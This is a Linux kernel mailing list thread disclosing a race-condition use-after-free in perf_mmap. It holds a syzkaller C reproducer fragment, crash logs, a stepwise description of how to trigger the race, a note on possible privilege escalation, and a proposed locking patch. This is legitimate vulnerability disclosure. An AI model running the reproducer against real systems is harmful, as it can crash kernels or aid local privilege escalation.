// bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Sat, Jan 31, 2026 at 09:21:23PM +0800, 余昊铖 wrote:

Can you turn this into a patch we can apply (properly sent, real name used, etc.) so that the maintainers can review it and apply it correctly?

Also, be sure to send this to the correct people, I don't think that the ext4 developers care that much about perf :)

thanks,

greg k-h
{ "author": "Greg KH <gregkh@linuxfoundation.org>", "date": "Sun, 1 Feb 2026 09:18:40 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition in which a ring_buffer object's reference count is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel later attempts to access or increment it.

I verified this on Linux kernel version 6.18.5.

Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning. The full report is below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/Warning: When thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb() or map_range()), the refcount_t infrastructure detects an "addition on 0", resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}

 	return ret;
 }
-- 
2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false 